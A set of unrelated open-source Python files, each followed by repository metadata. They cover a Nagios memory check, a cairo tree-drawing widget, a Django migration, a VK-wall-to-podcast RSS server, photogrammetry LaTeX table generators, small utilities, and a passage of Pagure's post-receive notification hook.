pl_op['exit_status'] = utils.PluginStatusCode.OK
try:
pl_op["message"] += ("- %.2f%% used(%.2fGB out of %.2fGB)|"
"Total=%.2fGB;%.2f;%.2f;0;%.2f"
" Used=%.2fGB Buffered=%.2fGB"
" Cached=%.2fGB" % (
float(s['memory']['memused-percent']),
utils.convertSize(int(s['memory']['memused']),
"KB", "GB"),
totalMem,
totalMem,
war_value,
crit_value,
totalMem,
utils.convertSize(int(s['memory']['memused']),
"KB", "GB"),
utils.convertSize(int(s['memory']['buffers']),
"KB", "GB"),
utils.convertSize(int(s['memory']['cached']),
"KB", "GB")))
except (KeyError, ValueError, TypeError) as e:
pl_op["message"] = "key: %s not found" % str(e)
pl_op["exit_status"] = utils.PluginStatusCode.UNKNOWN
return pl_op
return pl_op
if __name__ == '__main__':
args = parse_input()
if args.critical <= args.warning:
print "UNKNOWN:Critical must be greater than Warning."
sys.exit(utils.PluginStatusCode.UNKNOWN)
try:
st = sadf.getLatestStat(sadf.sadfExecCmd(_sadfMemCommand),
args.interval if args.interval else 1)
except (sadf.SadfCmdExecFailedException,
sadf.SadfXmlErrorException) as e:
print str(e)
exit(utils.PluginStatusCode.UNKNOWN)
d = showMemStat(args.warning, args.critical, st)
print d["message"]
sys.exit(d['exit_status'])
|
dealnews/gluster-nagios-addons
|
plugins/memory.py
|
Python
|
gpl-2.0
| 4,532
|
import cairo
import pango
import gtk
from core.world import TheWorld
from ontology.thing import Thing
from widgets.primitives import Primitives
class NodeTree(Thing):
def __init__(self, root_node):
Thing.__init__(self)
self.root_node = root_node
self.x_offset = 0.0
self.y_offset = 0.0
self.width = 1.5
self.height = 1.5
self.cache_drawing_operations = False
self.cached_render = None
self.cached_scale = TheWorld.scale
# TODO - fix rotation for cached bitmaps
def draw(self, context):
Thing.draw(self, context)
# draw a bounding box
#Primitives.bounding_box(context, -0.5, -0.5, 1.0, 1.0)
# set origin to top left
#context.translate(-0.5 + (self.root_node.width / 2.0), -0.5 + (self.root_node.height / 2.0))
context.translate(-0.5, -0.5)
if self.cache_drawing_operations:
# check if rendering cache needs to be refreshed
if (self.cached_render is None) or (self.cached_scale is not TheWorld.scale):
self.cached_render = self.__render_cache(context)
self.cached_scale = TheWorld.scale
# blast cached rendering to screen
context.save()
pixel_width, pixel_height = context.user_to_device_distance(self.width, self.height)
context.scale(1.0 / pixel_width, 1.0 / pixel_height)
context.set_source_surface(self.cached_render)
context.paint()
context.restore()
else:
# draw connectors first for z-order
context.save()
self.x_offset = 0
self.y_offset = 0
self.draw_connectors(context, self.root_node)
self.x_offset = 0
self.y_offset = 0
self.draw_nodes(context, self.root_node)
context.restore()
def __render_cache(self, context):
pixel_width, pixel_height = context.user_to_device_distance(self.width, self.height)
print (pixel_width, pixel_height)
surface = context.get_target().create_similar(cairo.CONTENT_COLOR_ALPHA, int(pixel_width), int(pixel_height))
#ctx = cairo.Context(surface)
ctx = gtk.gdk.CairoContext(cairo.Context(surface)) # NB! pango only works with gtk.gdk.CairoContext NOT cairo.Context
ctx.scale(pixel_width, pixel_height)
# draw connectors first for z-order
self.x_offset = 0
self.y_offset = 0
self.draw_connectors(ctx, self.root_node)
self.x_offset = 0
self.y_offset = 0
self.draw_nodes(ctx, self.root_node)
del ctx
return surface
def draw_connectors(self, context, node):
node.x = self.x_offset * 0.08
node.y = self.y_offset * 0.04
# draw connectors
parents = node.parents()
if len(parents):
parent_node = parents[0]
(x1, y1) = (parent_node.center_x, parent_node.center_y)
(x2, y2) = (node.center_x, node.center_y)
context.set_line_width(0.001)
context.set_source_rgb(0.0, 0.0, 1.0)
context.move_to(x1, y1)
context.line_to(x2, y2)
context.stroke()
self.x_offset += 1
if not node.children():
self.y_offset += 1
for child in node.children():
self.draw_connectors(context, child)
self.x_offset -= 1
def draw_nodes(self, context, node):
context.save()
# don't need to recalc - already layed out in draw_connectors
#node.x = self.x_offset * 0.08
#node.y = self.y_offset * 0.02
## draw connectors
#parents = node.parents()
#if len(parents):
#parent_node = parents[0]
#(x1, y1) = (parent_node.center_x, parent_node.center_y)
#(x2, y2) = (node.center_x, node.center_y)
#context.set_line_width(0.002)
#context.set_source_rgb(0.0, 0.0, 0.5)
#context.move_to(x1, y1)
#context.line_to(x2, y2)
#context.stroke()
context.translate(node.center_x, node.center_y)
context.scale(node.width, node.height)
node.draw(context)
context.restore()
#self.x_offset += 1
#if not node.children():
# self.y_offset += 1
for child in node.children():
self.draw_nodes(context, child)
#self.x_offset -= 1
|
antoinevg/survival
|
widgets/asteditor/nodetree.py
|
Python
|
gpl-2.0
| 4,118
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('links', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='category',
options={'verbose_name_plural': 'Categories'},
),
migrations.AddField(
model_name='link',
name='icon',
field=models.CharField(default='', max_length=32),
preserve_default=False,
),
]
|
udragon/webportal
|
links/migrations/0002_auto_20150408_2203.py
|
Python
|
gpl-2.0
| 568
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Microservice for making podcast rss feed from vk.com audiogroup's walls
and rss feeds for aggregators
"""
import os
import re
import sys
from datetime import datetime
from libs.esvk.esvk import esVKWall
from libs.esrss.esrsslite import esRss
import libs.server.bottle as bottle
import libs.server.wsgiserver as wsgiserver
route = bottle.route
response = bottle.response
static = bottle.static_file
if len(sys.argv) >= 4:
if sys.argv[3]:
urlpref = sys.argv[3]
else:
urlpref = ''
else:
urlpref = ''
if len(sys.argv) >= 3:
if sys.argv[2]:
host = sys.argv[2]
else:
host = 'localhost'
else:
host = 'localhost'
if len(sys.argv) >= 2:
if sys.argv[2]:
port = int(sys.argv[1])
else:
port = 8080
else:
port = 8080
audiopostfix = 'vk2podaudio'
if urlpref:
localaudiourl = 'http://%s/%s' % (urlpref, audiopostfix)
else:
localaudiourl = 'http://%s:%s/%s' % (host, str(port), audiopostfix)
vw = esVKWall()
def duration(sec):
s = int(sec)
dur = str(s / 60 % 60).zfill(2) + ':' + str(s % 60).zfill(2)
if s > 360:
dur = str(s / 60 / 60) + ':' + dur
return dur
def wall2Pod(gname, localaudiourl=localaudiourl, count=20, offset=0):
if gname:
if int(count) > 100:
count = 100
group = vw.getGroup(gname)
if group['is_closed'] == 0:
photo = vw.getBiggestPhoto(group)
if photo:
rss = esRss(title=group['name'], link='http://vk.com/' + gname, description=group['description'], image_url=photo)
else:
rss = esRss(title=group['name'], link='http://vk.com/' + gname, description=group['description'])
items = vw.getWall(gname, count, offset)['response']
if items.has_key('items'):
items = items['items']
for i in items:
content = ''
if type(i) == dict:
if i.has_key('text'):
description = i['text']
if i.has_key('attachments'):
for a in i['attachments']:
for c in a.keys():
if c == 'photo':
description = vw.getBiggestPhoto(a[c], True) + '<br>' + description
for c in a.keys():
if c == 'audio':
if i.has_key('from_id'):
link = 'https://vk.com/wall' + str(i['from_id']) + '_' + str(i['id'])
elif i.has_key('owner_id'):
link = 'https://vk.com/wall' + str(i['owner_id']) + '_' + str(['id'])
else:
link = ''
if link:
if not content:
r = vw.s.get(link)
if r.ok:
content = r.content.replace('\n', ' ')
oa_id = str(a[c]['owner_id']) + '_' + str(a[c]['id'])
dur = re.findall('(?u)play_' + oa_id + '.*?_audio_duration">(.*?)<',
content)
if dur:
dur = ' [%s]' % dur[0]
else:
dur = ''
title = a[c]['artist'] + ' - ' + a[c]['title']
title = title.replace('/', '_')
rss.addItem(title=title + dur, description=description, link=link,
enclosure_url=localaudiourl + '/' + oa_id + '/' + title + '.mp3',
enclosure_type='audio/mpeg', pubDate=datetime.strftime(
datetime.fromtimestamp(int(i['date'])), '%a, %d %b %Y %T'))
return rss.Feed()
else:
print "ERROR: Group is closed"
return ''
def wall2RSS(gname, localaudiourl=localaudiourl, count=20, offset=0):
if gname:
if int(count) > 100:
count = 100
group = vw.getGroup(gname)
if group['is_closed'] == 0:
photo = vw.getBiggestPhoto(group)
if photo:
rss = esRss(title=group['name'], link='http://vk.com/' + gname, description=group['description'], image_url=photo)
else:
rss = esRss(title=group['name'], link='http://vk.com/' + gname, description=group['description'])
items = vw.getWall(gname, count, offset)['response']
if items.has_key('items'):
items = items['items']
for i in items:
if type(i) == dict:
title = ''
description = ''
if i.has_key('text'):
description = i['text']
title = description.split('\n')[0]
if i.has_key('from_id'):
link = 'https://vk.com/wall' + str(i['from_id']) + '_' + str(i['id'])
elif i.has_key('owner_id'):
link = 'https://vk.com/wall' + str(i['owner_id']) + '_' + str(['id'])
else:
link = ''
if i.has_key('attachments'):
for a in i['attachments']:
for c in a.keys():
if c == 'photo':
description += '<br>' + vw.getBiggestPhoto(a[c], True) + '<br>'
if c == 'video':
if a[c].has_key('description'):
description += '<br><a href="%s"><img src="%s"></a><br>%s [VIDEO]' % (link,
vw.getBiggestPhoto(a[c]), a[c]['description'])
else:
description += '<br><a href="%s"><img src="%s"></a><br> [VIDEO]' % (link,
vw.getBiggestPhoto(a[c]))
if c == 'audio':
# if a[c].has_key('duration'):
# dur = duration(a[c]['duration'])
audiotitle = ''
if a[c].has_key('title'):
audiotitle = a[c]['title']
if a[c].has_key('artist'):
if audiotitle:
audiotitle = a[c]['artist'] + ' - ' + audiotitle
else:
audiotitle = a[c]['artist']
title = title.replace('/', '_')
description += '<br><a href="%s">%s</a>' % (localaudiourl + '/' +
str(a[c]['owner_id']) + '_' + str(a[c]['id']) + '/' + audiotitle +
'.mp3', audiotitle)
if c == 'link':
if a[c].has_key('description'):
description += '<br>' + a[c]['description']
if a[c].has_key('title'):
ltitle = a[c]['title']
if not title and len(i['attachments']) == 1:
title = ltitle
else:
ltitle = ''
if a[c].has_key('photo'):
photo = vw.getBiggestPhoto(a[c]['photo'])
if ltitle:
description += '<br><a href="%s"><img src="%s" alt="%s"></a>' % (
a[c]['url'], photo, ltitle)
else:
description += '<br><a href="%s"><img src="%s"></a>' % (
a[c]['url'], photo)
else:
if ltitle:
description += '<br><a href="%s">%s</a>' % (a[c]['url'], ltitle)
if c == 'doc':
if a[c].has_key('title'):
dtitle = a[c]['title']
if a[c].has_key('ext'):
if a[c]['ext'] == u'gif':
photo = '<a href="%s">%s<br><img src="%s" alt="%s"></a>' % \
(a[c]['url'], dtitle, a[c]['url'], dtitle)
if a[c].has_key('preview'):
if a[c]['preview'].has_key('photo'):
if dtitle and not photo:
photo = '<a href="%s">%s<br><img src="%s" alt="%s"></a>' % \
(a[c]['url'], dtitle, vw.getBiggestPhoto(a[c]['preview']['photo']),
dtitle)
else:
if not photo:
photo = '<a href="%s"><img src="%s"></a>' % (a[c]['url'],
vw.getBiggestPhoto(a[c]['preview']['photo']))
else:
photo = ''
else:
photo = ''
if photo:
description += '<br>' + photo
else:
description += '<br><a href="%s">%s</a>' % (a[c]['url'], a[c]['title'])
if not (title and description):
title = '---'
rss.addItem(title=title, description=description, link=link,
pubDate=datetime.strftime(datetime.fromtimestamp(int(i['date'])), '%a, %d %b %Y %T'))
return rss.Feed()
else:
print "ERROR: Group is closed"
return ''
@route('/')
def root():
return static(filename='index.html', root=os.path.join(os.path.curdir, 'static'), mimetype='text/html')
@route('/favicon.ico')
def get_favicon():
return static(filename='favicon.ico', root=os.path.join(os.path.curdir, 'static'), mimetype='image/x-icon')
@route('/vk2pod/<query>')
@route('/vk2pod/<query>/<count:re:[0-9]+>')
@route('/vk2pod/<query>/<count:re:[0-9]+>/<offset:re:[0-9]+>')
def vk2podq(query='', count=10, offset=0):
if query:
response.headers['Content-Type'] = 'xml/application'
return wall2Pod(query, localaudiourl=localaudiourl, count=count, offset=offset)
else:
response.headers['Content-Type'] = 'text/plain'
return 'Empty request'
@route('/vk2rss/<query>')
@route('/vk2rss/<query>/<count>')
@route('/vk2rss/<query>/<count>/<offset>')
def vk2rssq(query='', count=10, offset=0):
if query:
response.headers['Content-Type'] = 'xml/application'
return wall2RSS(query, localaudiourl=localaudiourl, count=count, offset=offset)
else:
response.headers['Content-Type'] = 'text/plain'
return 'Empty request'
@route('/' + audiopostfix + '/<oa_id>', method='GET')
@route('/' + audiopostfix + '/<oa_id>/<title>', method='GET')
def audioStream(oa_id='', title=''):
if oa_id:
oa_id = oa_id.replace('.mp3', '')
url = vw.getAudio(oa_id)
headers = vw.s.head(url).headers
for h in ['content-length', 'expires', 'content-type']:
response.headers.append(h, headers[h])
return vw.s.get(url, stream=True).raw
else:
response.headers['Content-Type'] = 'text/plain'
return 'Empty request'
@route('/' + audiopostfix + '/<oa_id>', method='HEAD')
@route('/' + audiopostfix + '/<oa_id>/<title>', method='HEAD')
def audioHead(oa_id='', title=''):
if oa_id:
oa_id = oa_id.replace('.mp3', '')
url = vw.getAudio(oa_id)
return vw.s.head(url).raw
else:
response.headers['Content-Type'] = 'text/plain'
return 'Empty request'
print 'Server will started on host %s and port %s' % (host, port)
bottle.debug(False)
wsgiapp = bottle.default_app()
httpd = wsgiserver.Server(wsgiapp, listen=host, port=port)
httpd.listen = host
httpd.port = port
httpd.serve_forever()
#TODO: repost
#TODO: player
|
alive-corpse/esvk2pod
|
esvk2pod.py
|
Python
|
gpl-2.0
| 13,449
|
import numpy as np
from math import pi
# File contains helper functions for priniting various protocols
# helper functions for creation of latex tables for the thesis
def GenerateLatexPointsIterationTable(diff, out_file):
_genDiff(diff, out_file, "Pt. no.")
def GenerateLatexPhotosIterationTable(diff, out_file):
_genDiff(diff, out_file, "Ph. no.")
def reprojection_errors(e_repro, prot_fd):
fd = open(prot_fd, "w")
e_repro = np.absolute(e_repro)
e_repro = e_repro * (4592 / 25.1) # transformation to pixels
amax = np.amax(e_repro)
amin = np.amin(e_repro)
avg = np.average(e_repro)
fd.write("max. & %8.6f \\\\ \hline \n" % amax)
fd.write("min. & %8.6f \\\\ \hline \n" % amin)
fd.write("avg. & %8.6f \\\\ \hline \n" % avg)
perc = [90, 75, 50, 25, 10]
for p in perc:
pr = np.percentile(e_repro, p, axis=0)
fd.write("perc. %d & %8.6f \\\\ \hline \n" % (p, pr))
fd.close()
return p
def GetStats(diff):
adiff = np.absolute(diff)
avg = list(np.average(adiff, axis = 0))
amax = list(np.amax(adiff, axis = 0))
avg[0] = "avg."
amax[0] = "max."
stats = [avg, amax]
return stats
def GenerateLatexPhotosAnglesIterationTable(diff, out_file):
fd = open(out_file, "w")
r, c = diff.shape
diff = diff[diff[:,0].argsort(axis=0)]
fd.write("\\begin{center} \n")
fd.write("\\rowcolors{1}{Gray}{white} \n")
fd.write("\\begin{longtable}{| c || \n")
ncols = c
for i in range(3):
for j in range( (ncols - 1) / 3):
if j == 0:
fd.write("c || ")
else:
fd.write("c | ")
fd.write("} \n")
fd.write("\hline \n")
fd.write("Photo no. & ")
for i in range(3):
for j in range( (ncols - 1) / 3):
if j == 0:
fd.write("\\textbf{Bef. BBA}}")
else:
fd.write("\\textbf{It. %d}}" % (j))
if i * (j-1) < 3 * (ncols - 1):
fd.write(" & ")
fd.write("\\\\ \hline \n")
new_diff = np.array(diff)
width = (diff.shape[1] - 1) / 3
for i, col in enumerate(diff.T):
if i == 0:
continue
mod_col = (i + 2) % 3
step = (i - 1) / 3
shift = mod_col * width
new_diff[:, shift + step + 1] = col
for i_row, row in enumerate(new_diff):
mod_row = (i_row) % 3
for i, col in enumerate(row):
if i == 0:
fd.write("%d & " % col)
continue
fd.write("%6.3f " % (col * 180 / pi))
if i < (len(row) - 1):
fd.write(" & ")
fd.write("\\\\ \hline \n")
stats = GetStats(new_diff)
for i_row, row in enumerate(stats):
mod_row = (i_row) % 3
for i, col in enumerate(row):
if i == 0:
fd.write("%s & " % col)
continue
fd.write("%6.3f " % (col * 180 / pi))
if i < (len(row) - 1):
fd.write(" & ")
fd.write("\\\\ \hline \n")
fd.write("\hline \n")
fd.write("\end{longtable}\n")
fd.write("\end{center}\n")
fd.close()
def _genDiff(diff, out_file, name):
fd = open(out_file, "w")
r, c = diff.shape
diff = diff[diff[:,0].argsort(axis=0)]
fd.write("\\begin{longtable}{| c || \n")
for i in range(c - 1):
fd.write("c | ")
fd.write("} \n")
fd.write("\hline \n")
for i in range(c):
if i == 0:
fd.write(name)
elif i == 1:
fd.write("Bef. I.")
else:
fd.write("I. %d " % (i - 1))
if i != c - 1:
fd.write("&")
fd.write("\\\\ \hline \n")
for row in diff:
for i, col in enumerate(row):
if i == 0:
fd.write("%d " % col)
else:
fd.write("%6.3f " % col)
if i != c - 1:
fd.write(" & ")
fd.write("\\\\ \hline \n")
stats = GetStats(diff)
for row in stats:
for i, col in enumerate(row):
if i == 0:
fd.write("%s " % col)
else:
fd.write("%6.3f " % col)
if i != len(row) - 1:
fd.write("&")
fd.write("\\\\ \hline \n")
fd.write("\hline \n")
fd.write("\end{longtable}\n")
fd.write("\end{center}\n")
fd.close()
def CreateParametersLatex(i_num, cov, Xa, dx, bi, apo, prot_fd, unk, gcps, free_net, l):
fd = open(prot_fd, "w")
sigmas = np.sqrt(np.diagonal(cov))
def _getDt(Xa, dx, sigmas, unk_l, x_col, pt):
dt = [pt.GetId()]
for i, un in enumerate(unk_l):
val = Xa[x_col + i]
s = sigmas[x_col + i]
if un in ['ph', 'om', 'ka']:
val = val * 180 / pi
s = s * 180 / pi
dt.append(val)
dt.append(s)
return dt
#diff = diff[numpy.lexsort(diff[:,0])]
dts = []
pt_step = len(unk.pt)
for pt_idx in range(bi.tie_pts_n):
pt = bi.idxs_pts[pt_idx]
pt_x_col = apo.pt_0col + pt_idx * pt_step
dts.append(_getDt(Xa, dx, sigmas, unk.pt, pt_x_col, pt))
dts = np.array(dts)
dts = dts[dts[:,0].argsort(axis=0)]
for d in dts:
for i, c in enumerate(d):
if i == 0:
fd.write("%d " % (c))
else:
fd.write("%10.3f " % (c))
if i < len(d) - 1:
fd.write(" & ")
fd.write(" \\\\ \hline \n")
fd.close()
def CreatePhootoParametersLatex(i_num, cov, Xa, dx, bi, apo, prot_fd, unk, gcps, free_net, l):
fd = open(prot_fd, "w")
sigmas = np.sqrt(np.diagonal(cov))
def _printFeature(Xa, dx, sigmas, unk_l, x_col, ph):
fd.write("%d &" % (ph.GetId()))
for i, un in enumerate(unk_l):
val = Xa[x_col + i]
s = sigmas[x_col + i]
if un in ['ph', 'om', 'ka']:
val = val * 180 / pi
s = s * 180 / pi
fd.write("%10.3f & %10.3f " % (val, s))
if i < len(unk_l) - 1:
fd.write(" & ")
fd.write(" \\\\ \hline \n")
ph_step = len(unk.ph)
for ph_idx in range(bi.photos_n):
ph = bi.idxs_phs[ph_idx]
ph_x_col = apo.ph_0col + ph_idx * ph_step
_printFeature(Xa, dx, sigmas, unk.ph, ph_x_col, ph)
fd.close()
# functions for creation of adjustment protocols
def CreateIterationProtocolMeasurements(i_num, cov_l, e_repro, bi, prot_fd):
prot_fd.write(_('\n\n\n\n*********************************************************************'))
prot_fd.write(_('\n\nIteration: %d\n\n' % (i_num + 1)))
sigmas = np.sqrt(np.diagonal(cov_l))
prev_ph = None
for i, d in enumerate(bi.Lrows_idxs):
cam, ph, pt, v = d
i1 = i * 2
i2 = i * 2 + 1
if prev_ph is None or prev_ph != ph:
prev_ph = ph
prot_fd.write("\n\nPhoto %10d:\n" % (ph.GetId()))
phpt = pt.GetPhotoPoints()[ph]
prot_fd.write("%10d: %10.4f %10.4f " % (pt.GetId(), phpt[0], phpt[1], ))
prot_fd.write("%10.4f %10.4f" % (sigmas[i1], sigmas[i2]))
prot_fd.write("%10.4f %10.4f" % (e_repro[i1], e_repro[i2]))
prot_fd.write("\n")
def CreateParametersIterationProtocol(i_num, cov, Xa, dx, bi, apo, prot_fd, unk, gcps, free_net, l):
prot_fd.write(_('\n\n\n\n*********************************************************************'))
prot_fd.write(_('\n\nIteration: %d\n\n' % (i_num + 1)))
prot_fd.write(_('Ground control point differences:\n'))
sigmas = np.sqrt(np.diagonal(cov))
#sigmas = None
prot_fd.write("%10s, %10s\n" % ("gcp id", "diff"))
for gcp in gcps.itervalues():
if gcp.GetCoords() is None or ( not gcp.GetGcp()[1] and not free_net):
continue
dist = np.linalg.norm(gcp.GetGcp()[0] - gcp.GetCoords())
bingo_dist = np.linalg.norm(gcp.GetGcp()[0] - gcp.GetResultCoords())
prot_fd.write("%10d, %10.4f" % (gcp.GetId(), dist))
prot_fd.write("%10d, %10.4f, %10.4f" % (gcp.GetId(), dist, bingo_dist))
prot_fd.write("\n")
prot_fd.write("\n\n")
cam_step = len(unk.cam)
ph_step = len(unk.ph)
pt_step = len(unk.pt)
def _printParamsLine(x, unk_l, x_col):
for i, un in enumerate(unk_l):
val = x[x_col + i]
if un in ['ph', 'om', 'ka']:
val = val * 200 / pi
prot_fd.write("%15.4f" % (val))
def _printParamCaptions(unk_l):
for i, un in enumerate(unk_l):
prot_fd.write("%15s" % (un))
prot_fd.write("\n\n")
def _printFeature(Xa, dx, sigmas, unk_l, x_col):
_printParamsLine(Xa, unk_l, x_col)
prot_fd.write("\n")
_printParamsLine(dx, unk_l, x_col)
prot_fd.write("\n")
_printParamsLine(sigmas, unk_l, x_col)
prot_fd.write("\n\n")
prot_fd.write(_('Interior orientaitons adjustment results\n'))
for cam_idx in range(bi.cams_n):
if cam_idx == 0:
_printParamCaptions(unk.cam)
cam = bi.idxs_phs[cam_idx]
prot_fd.write(_("Camera %d\n" % cam.GetId()))
cam_x_col = apo.cam_0col + cam_idx * cam_step
_printFeature(Xa, dx, sigmas, unk.cam, cam_x_col)
prot_fd.write(_('Exterior orientaitons adjustment results\n'))
for ph_idx in range(bi.photos_n):
if ph_idx == 0:
_printParamCaptions(unk.ph)
ph = bi.idxs_phs[ph_idx]
prot_fd.write(_("Photo %d\n" % ph.GetId()))
ph_x_col = apo.ph_0col + ph_idx * ph_step
_printFeature(Xa, dx, sigmas, unk.ph, ph_x_col)
prot_fd.write(_('Object points orientaitons adjustment results\n'))
for pt_idx in range(bi.tie_pts_n):
if pt_idx == 0:
_printParamCaptions(unk.pt)
pt = bi.idxs_pts[pt_idx]
prot_fd.write(_("Point %d\n" % pt.GetId()))
pt_x_col = apo.pt_0col + pt_idx * pt_step
_printFeature(Xa, dx, sigmas, unk.pt, pt_x_col)
|
ostepok/grass-gis-bba
|
src/i.ortho.bba/protocols.py
|
Python
|
gpl-2.0
| 10,236
|
print "Hello CPP!"
|
dkleissa/cpp_2014
|
helloworld.py
|
Python
|
gpl-2.0
| 18
|
#!/usr/bin/python
'''
transpose tsv so that columns headings become row headings
'''
import sys
import numpy as np
data = np.transpose(np.genfromtxt(sys.argv[1],dtype=object,delimiter='\t'))
np.savetxt(sys.stdout,data,fmt='%s',delimiter='\t')
|
eastmallingresearch/crosslink
|
compare_progs/transpose_tsv.py
|
Python
|
gpl-2.0
| 247
|
# -*- coding: utf-8 -*-
"""
(c) 2016-2017 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <pingou@pingoured.fr>
"""
from __future__ import unicode_literals, print_function, absolute_import
import logging
import pygit2
import six
import pagure.config
import pagure.exceptions
import pagure.lib.query
import pagure.lib.tasks
import pagure.lib.tasks_services
import pagure.utils
from pagure.hooks import BaseHook, BaseRunner
_config = pagure.config.reload_config()
_log = logging.getLogger(__name__)
def send_fedmsg_notifications(project, topic, msg):
""" If the user or admin asked for fedmsg notifications on commit, this will
do it.
"""
fedmsg_hook = pagure.lib.plugins.get_plugin("Fedmsg")
fedmsg_hook.db_object()
always_fedmsg = _config.get("ALWAYS_FEDMSG_ON_COMMITS") or None
# Send fedmsg and fedora-messaging notification
# (if fedmsg and fedora-messaging are there and set-up)
if always_fedmsg or (project.fedmsg_hook and project.fedmsg_hook.active):
if _config.get("FEDMSG_NOTIFICATIONS", True):
try:
print(" - to fedmsg")
import fedmsg
config = fedmsg.config.load_config([], None)
config["active"] = True
config["endpoints"]["relay_inbound"] = config["relay_inbound"]
fedmsg.init(name="relay_inbound", **config)
pagure.lib.notify.fedmsg_publish(topic=topic, msg=msg)
except Exception:
_log.exception(
"Error sending fedmsg notifications on commit push"
)
if _config.get("FEDORA_MESSAGING_NOTIFICATIONS", False):
try:
print(" - to fedora-message")
pagure.lib.notify.fedora_messaging_publish(topic, msg)
except Exception:
_log.exception(
"Error sending fedora-messaging notifications on "
"commit push"
)
def send_stomp_notifications(project, topic, msg):
""" If the user or admin asked for stomp notifications on commit, this will
do it.
"""
always_stomp = _config.get("ALWAYS_STOMP_ON_COMMITS") or None
# Send stomp notification (if stomp is there and set-up)
if always_stomp or (project.fedmsg_hook and project.fedmsg_hook.active):
try:
print(" - to stomp")
pagure.lib.notify.stomp_publish(topic, msg)
except Exception:
_log.exception("Error sending stomp notifications on commit push")
def send_mqtt_notifications(project, topic, msg):
""" If the user or admin asked for mqtt notifications on commit, this will
do it.
"""
always_mqtt = _config.get("ALWAYS_MQTT_ON_COMMITS") or None
# Send mqtt notification (if mqtt is there and set-up)
if always_mqtt or (project.fedmsg_hook and project.fedmsg_hook.active):
try:
print(" - to mqtt")
pagure.lib.notify.mqtt_publish(topic, msg)
except Exception:
_log.exception("Error sending stomp notifications on commit push")
def send_webhook_notifications(project, topic, msg):
""" If the user asked for webhook notifications on commit, this will
do it.
"""
if project.settings.get("Web-hooks"):
try:
print(" - to web-hooks")
pagure.lib.tasks_services.webhook_notification.delay(
topic=topic,
msg=msg,
namespace=project.namespace,
name=project.name,
user=project.user.username if project.is_fork else None,
)
except Exception:
_log.exception(
"Error sending web-hook notifications on commit push"
)
def send_notifications(session, project, repodir, user, refname, revs, forced):
""" Send out-going notifications about the commits that have just been
pushed.
"""
auths = set()
for rev in revs:
email = pagure.lib.git.get_author_email(rev, repodir)
name = pagure.lib.git.get_author(rev, repodir)
author = pagure.lib.query.search_user(session, email=email) or name
auths.add(author)
authors = []
for author in auths:
if not isinstance(author, six.string_types):
author = author.to_json(public=True)
authors.append(author)
if revs:
revs.reverse()
print("* Publishing information for %i commits" % len(revs))
topic = "git.receive"
msg = dict(
total_commits=len(revs),
start_commit=revs[0],
end_commit=revs[-1],
branch=refname,
forced=forced,
authors=list(authors),
agent=user,
repo=project.to_json(public=True)
if not isinstance(project, six.string_types)
else project,
)
# Send blink notification to any 3rd party plugins, if there are any
pagure.lib.notify.blinker_publish(topic, msg)
if not project.private:
send_fedmsg_notifications(project, topic, msg)
send_stomp_notifications(project, topic, msg)
send_mqtt_notifications(project, topic, msg)
send_webhook_notifications(project, topic, msg)
if (
_config.get("PAGURE_CI_SERVICES")
and project.ci_hook
and project.ci_hook.active_commit
and not project.private
):
pagure.lib.tasks_services.trigger_ci_build.delay(
project_name=project.fullname,
cause=revs[-1],
branch=refname,
ci_type=project.ci_hook.ci_type,
branch_to=None,
)
def inform_pull_request_urls(
session, project, commits, refname, default_branch
):
""" Inform the user about the URLs to open a new pull-request or visit
the existing one.
"""
target_repo = project
if project.is_fork:
target_repo = project.parent
pr_uids = []
if (
commits
and refname != default_branch
and target_repo.settings.get("pull_requests", True)
):
print()
prs = pagure.lib.query.search_pull_requests(
session,
project_id_from=target_repo.id,
status="Open",
branch_from=refname,
)
if project.id != target_repo.id:
prs.extend(
pagure.lib.query.search_pull_requests(
session,
project_id_from=project.id,
status="Open",
branch_from=refname,
)
)
# Link to existing PRs if there are any
seen = len(prs) != 0
for pr in prs:
# Refresh the PR in the db and everywhere else where needed
pagure.lib.tasks.update_pull_request.delay(pr.uid)
# Link tickets with pull-requests if the commit mentions it
pagure.lib.tasks.link_pr_to_ticket.delay(pr.uid)
# Inform the user about the PR
print("View pull-request for %s" % refname)
print(
" %s/%s/pull-request/%s"
% (_config["APP_URL"].rstrip("/"), pr.project.url_path, pr.id)
)
pr_uids.append(pr.uid)
# If no existing PRs, provide the link to open one
if not seen:
print("Create a pull-request for %s" % refname)
print(
" %s/%s/diff/%s..%s"
% (
_config["APP_URL"].rstrip("/"),
project.url_path,
default_branch,
refname,
)
)
print()
return pr_uids
class DefaultRunner(BaseRunner):
""" Runner for the default hook."""
@staticmethod
def post_receive(session, username, project, repotype, repodir, changes):
""" Run the default post-receive hook.
For args, see BaseRunner.runhook.
"""
if repotype != "main":
if _config.get("HOOK_DEBUG", False):
print("Default hook only runs on the main project repository")
return
if changes:
# Retrieve the default branch
repo_obj = pygit2.Repository(repodir)
default_branch = None
if not repo_obj.is_empty and not repo_obj.head_is_unborn:
default_branch = repo_obj.head.shorthand
pr_uids = []
for refname in changes:
(oldrev, newrev) = changes[refname]
forced = False
if set(newrev) == set(["0"]):
print(
"Deleting a reference/branch, so we won't run the "
"pagure hook"
)
return
elif set(oldrev) == set(["0"]):
oldrev = "^%s" % oldrev
elif pagure.lib.git.is_forced_push(oldrev, newrev, repodir):
forced = True
base = pagure.lib.git.get_base_revision(
oldrev, newrev, repodir
)
if base:
oldrev = base[0]
refname = refname.replace("refs/heads/", "")
commits = pagure.lib.git.get_revs_between(
oldrev, newrev, repodir, refname
)
log_all = _config.get("LOG_ALL_COMMITS", False)
if log_all or refname == default_branch:
print(
"Sending to redis to log activity and send commit "
"notification emails"
)
else:
print("Sending to redis to send commit notification emails")
# This is logging the commit to the log table in the DB so we can
# render commits in the calendar heatmap.
# It is also sending emails about commits to people using the
# 'watch' feature to be made aware of new commits.
pagure.lib.tasks_services.log_commit_send_notifications.delay(
name=project.name,
commits=commits,
abspath=repodir,
branch=refname,
default_branch=default_branch,
namespace=project.namespace,
username=project.user.user if project.is_fork else None,
)
# This one is sending fedmsg and web-hook notifications for project
# that set them up
send_notifications(
session, project, repodir, username, refname, commits, forced
)
# Now display to the user if this isn't the default branch links to
# open a new pr or review the existing one
pr_uids.extend(
inform_pull_request_urls(
session, project, commits, refname, default_branch
)
)
# Refresh of all opened PRs
parent = project.parent or project
if _config.get("GIT_HOOK_DB_RO", False):
pagure.lib.tasks.refresh_pr_cache(
parent.name,
parent.namespace,
